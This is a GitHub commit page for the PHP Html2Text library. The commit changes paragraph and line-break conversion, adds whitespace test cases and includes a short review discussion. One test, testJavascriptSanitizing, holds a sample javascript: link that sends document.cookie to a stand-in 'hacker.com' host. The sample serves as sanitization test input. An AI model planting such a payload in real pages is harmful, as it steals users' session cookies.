Skip to content

Commit

Permalink
Treat all paragraph content equally (Fixes #7)
Browse files Browse the repository at this point in the history
The content of paragraph tags should be treated equally. That is to say that
whitespace within the tag (newline, and spaces) should be compressed before
the tag is treated.
  • Loading branch information
andrewnicols authored and mtibben committed Oct 13, 2015
1 parent 731f734 commit 0d40933
Show file tree
Hide file tree
Showing 6 changed files with 74 additions and 9 deletions.
17 changes: 13 additions & 4 deletions src/Html2Text.php
Expand Up @@ -50,8 +50,6 @@ class Html2Text
'/<head[^>]*>.*?<\/head>/i', // <head>
'/<script[^>]*>.*?<\/script>/i', // <script>s -- which strip_tags supposedly has problems with
'/<style[^>]*>.*?<\/style>/i', // <style>s -- which strip_tags supposedly has problems with
'/<p[^>]*>/i', // <P>
'/<br[^>]*>/i', // <br>
'/<i[^>]*>(.*?)<\/i>/i', // <i>
'/<em[^>]*>(.*?)<\/em>/i', // <em>
'/(<ul[^>]*>|<\/ul>)/i', // <ul> and </ul>
Expand Down Expand Up @@ -82,8 +80,6 @@ class Html2Text
'', // <head>
'', // <script>s -- which strip_tags supposedly has problems with
'', // <style>s -- which strip_tags supposedly has problems with
"\n\n", // <P>
"\n", // <br>
'_\\1_', // <i>
'_\\1_', // <em>
"\n\n", // <ul> and </ul>
Expand Down Expand Up @@ -137,6 +133,8 @@ class Html2Text
*/
protected $callbackSearch = array(
'/<(h)[123456]( [^>]*)?>(.*?)<\/h[123456]>/i', // h1 - h6
'/[ ]*<(p)( [^>]*)?>(.*?)<\/p>[ ]*/si', // <p> with surrounding whitespace.
'/<(br)[^>]*>[ ]*/i', // <br> with leading whitespace after the newline.
'/<(b)( [^>]*)?>(.*?)<\/b>/i', // <b>
'/<(strong)( [^>]*)?>(.*?)<\/strong>/i', // <strong>
'/<(th)( [^>]*)?>(.*?)<\/th>/i', // <th> and </th>
Expand Down Expand Up @@ -511,6 +509,17 @@ protected function convertBlockquotes(&$text)
protected function pregCallback($matches)
{
switch (strtolower($matches[1])) {
case 'p':
// Replace newlines with spaces.
$para = str_replace("\n", " ", $matches[3]);

// Trim trailing and leading whitespace within the tag.
$para = trim($para);

// Add trailing newlines for this para.
return "\n" . $para . "\n";

This comment has been minimized.

Copy link
@voku

voku Oct 13, 2015

some of my "real-world"-tests (e.g.: https://github.com/voku/html2text/blob/master/tests/test6Html.html) failed with this change -> so I have to change "\n" into "\n\n"

-> return "\n\n" . $para . "\n\n";

This comment has been minimized.

Copy link
@mtibben

mtibben Oct 13, 2015

Owner

Hey @voku I'd love to get some more varied test cases, can you open a PR ?

case 'br':
return "\n";
case 'b':
case 'strong':
return $this->toupper($matches[3]);
Expand Down
51 changes: 51 additions & 0 deletions test/BasicTest.php
Expand Up @@ -19,6 +19,57 @@ public function basicDataProvider() {
'html' => '0',
'expected' => '0',
),
'Paragraph with whitespace wrapping it' => array(
'html' => 'Foo <p>Bar</p> Baz',
'expected' => "Foo\nBar\nBaz",
),
'Paragraph text with linebreak flat' => array(
'html' => "<p>Foo<br/>Bar</p>",
'expected' => <<<EOT
Foo
Bar
EOT
),
'Paragraph text with linebreak formatted with newline' => array(
'html' => <<<EOT
<p>
Foo<br/>
Bar
</p>
EOT
,
'expected' => <<<EOT
Foo
Bar
EOT
),
'Paragraph text with linebreak formatted whth newline, but without whitespace' => array(
'html' => <<<EOT
<p>Foo<br/>
Bar</p>
EOT
,
'expected' => <<<EOT
Foo
Bar
EOT
),
'Paragraph text with linebreak formatted with indentation' => array(
'html' => <<<EOT
<p>
Foo<br/>Bar
</p>
EOT
,
'expected' => <<<EOT
Foo
Bar
EOT
),
);
}

Expand Down
4 changes: 3 additions & 1 deletion test/BlockquoteTest.php
Expand Up @@ -22,11 +22,12 @@ public function blockquoteDataProvider()
EOT
,
'expected' => <<<EOT
Before
Before
> Foo bar baz HTML symbols &
After
EOT
,
),
Expand All @@ -53,6 +54,7 @@ public function blockquoteDataProvider()
> ZHU: Her name is Jolene. She’s nice. I like her.
I think the audience is winning.  - Derek
EOF
),
);
Expand Down
1 change: 1 addition & 0 deletions test/HeaderTest.php
Expand Up @@ -14,6 +14,7 @@ public function testToUpper()
WILL BE UTF-8 (ÄÖÜÈÉИЛČΛ) UPPERCASED
Will remain lowercased
EOT;

$html2text = new Html2Text($html);
Expand Down
7 changes: 4 additions & 3 deletions test/LinkTest.php
Expand Up @@ -69,12 +69,13 @@ public function testDoLinksInHtml()
EOT;

$expected =<<<EOT
Link text
Link text
Link text [http://example.com]
Link text [http://example.com]
Link text
[http://example.com]
EOT;

$html2text = new Html2Text($html);
Expand Down Expand Up @@ -124,7 +125,7 @@ public function testInvertedBoldLinks()

$this->assertEquals($expected, $html2text->getText());
}

public function testJavascriptSanitizing()
{
$html = '<a href="javascript:window.open(\'http://hacker.com?cookie=\'+document.cookie)">Link text</a>';
Expand Down
3 changes: 2 additions & 1 deletion test/PreTest.php
Expand Up @@ -20,13 +20,14 @@ public function testPre()
EOT;

$expected =<<<'EOT'
Before
Before
Foo bar baz
HTML symbols &
After
EOT;

$html2text = new Html2Text($html);
Expand Down

0 comments on commit 0d40933

Please sign in to comment.